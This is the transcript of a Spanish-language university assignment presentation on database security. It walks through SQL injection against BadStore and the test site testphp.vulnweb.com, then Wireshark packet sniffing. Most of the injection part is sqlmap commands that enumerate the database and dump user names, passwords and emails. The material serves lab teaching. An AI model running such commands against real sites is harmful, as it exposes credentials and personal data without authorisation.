ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
-
Upload
alexander-valencia-valderrama -
Category
Software
-
view
285 -
download
1
description
Transcript of ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
SEGURIDAD EN BASES DE DATOSMomento 2 grupal
Carlos Andrés Coutin GarciaCod: 1032360787
Alexander Valencia ValderramaCod: 98659968LILIANA ROJAS
Cod:DIANA KATERINE QUIÑONEZ
Cod:
JESUS EMIRO VEGADirector de Curso
UNIVERSIDAD NACIONAL ABIERTA Y A DISTANCIA “UNAD”ESCUELA DE CIENCIAS BASICA, TECNOLOGIA E INFORMATICA
Choco - Quibdó2014
1. Ataque por inyección de código SQL.
Descargue e instale la máquina virtual Virtualbox. - Descargue BadStore.- Descargue un programa para realizar ataque por inyección de código SQL sesugiere SQLMAP (http://sqlmap.org/) o Nmap (http://nmap.org/download.html.- Realizar un ataque a la base de datos de Badstore, con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc.- Realizar una presentación o video sobre el ataque realizado.
Realizando el ataque
Para determinar la vulnerabilidad del sitio que se nos dá, debemos colocar una comilla al lado del signo igual y actualizamos la página y esto nos debe indicar que tiene un error de sintaxis en la instrucción SQL, lo que lo hace vulnerable al ataque.
Entonces copiamos la URL y lo copiamos en el comando del software sqlmap y ejecutamos presionando la tecla Enter
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?artist=1 –bds
Este comando nos permitirá conocer el nombre de la base de datos, como lo muestra la siguiente gráfica
Conociendo el nombre de la base de datos podemos ahora conocer las tablas que hacen parte de esa base de datos por medio del siguiente comando
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart –tables
De este modo podremos conocer el nombre de las tablas, que hacen parte de esa base de datos
Una vez identificadas las tablas podremos conocer, las columnas de cada tabla, para ello debemos digitar el siguiente comando.
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart -T users –columns
Este comando nos mostrará, las columnas de la table Users, tal como lo muestra la siguiente gráfica.
Luego conocer las columnas de la tabla Users, debemos conocer el contenido de algunos de los campos, de dicha tabla. Por medio del siguiente comando podremos conocer el contenido del campo Uname, por medio del siguiente comando:
sqlmap.py -u
http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart -T users -C uname –dump
La siguiente gráfica nos muestra el contenido del campo uname
Así mismo para los campos restantes, tales como el contenido del campo name, por medio del siguiente comando. sqlmap.py -u
http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart -T users -C name –dump
La siguiente gráfica muestra el contenido del campo Name, en la table acuart
Y podemos seguir conociendo más datos de la tabla usuarios, ahora lo vamos a hacer con el campo email
Por si quedan dudas extraemos la información de la cedula
2. Ataque con inyección de código SQL a sitio web
Realizar un ataque a la base de datos del sitio http://testphp.vulnweb.com, con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc.
Lo primero que debemos es definir de qué modo se realizará el ataque, ya sea por sistema operativo Linux o por Microsoft. Para este caso se relaizara con Microsoft Luego de definir el sistema para el ataque se procede a descargar un programa para realizar ataque por inyección de código SQL se sugiere SQLMAP ( http://sqlmap.org/) o Nmap (http://nmap.org/download.html) y el programa Pyntos Descarga de pyntos
Descarga de sqlmap
Una vez descargados se necesita que la carpeta comprimida de sqlmap sea instalada en el mismo lado o unidad como se observa en la imagen.
Ahora validamos que la pagina suministrada sea vulnerable a ataques, esto se hace agregando el apostrofo‘ al final de url. Url a validar: http://testphp.vulnweb.comValidación de vulnerabilidad de la Url
Una vez analizada y verificado el posible ataque a realizar, procedemos a ubicarnos en por línea de comandos en la carpeta sqlmap con el comando cd .., de la siguiente manera:
Y una vez ubicados en la carpeta sqlmap, comenzamos con la ejecución de comando.Ejecución de comando para averiguar nombre de la base de datos:sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 --dbs
Ejecución de comando: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 --current-db; para extraer información de la base de datos
Comando para extraer el nombre de las tablas de la base de datos: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --tables
Comando para extraer las columnas de la base de datos: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 –T user --columns
Comando para extraer datos de las columnas de la base de datos: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user -C name –dump
Comando para validar password: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user -C pass –dump
Commando para verificar email: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user -C email –dump
3. Ataque por Sniffing.
Para esta práctica se debe descargar el software Wireshark desde el sitio web http://www.wireshark.org/download.html. La práctica consiste en la instalación del software Wireshark, luego con el software en ejecución tomar una observación prolongada, generando tráfico ftp, telnet, http, icmp, entre Una vez terminado el proceso de captura inicie el análisis de los paquetes e identifique que tipo de información se puede obtener a través de este tipo de ataque.
Se descarga el programa del página http://www.wireshark.org/download.html, verificación al abril el programa, damos clik, donde señala la fecha
A continuación encontramos un cuadro de diálogo, en el cual debemos seleccionar la tarjeta de red.
La tarjeta que se debe colocar a la escucha es la que recibe datos, luego de escogerla damos clik en Star, al instante se inicia con la captura de paquetes de datos de todos los hots conectados a la red.
Luego escribimos el protocolo que queremos filtrar, en el recuadro que indica la fechaAsi:
Cuando escribimos mal la dirección ip o el protocolo no presenta un error así:
Filtró desde el protocolo Ethernet
Filtró desde el protocolo TCP
Filtró desde el HTTP
Filtros por DNS
Fin de la presentación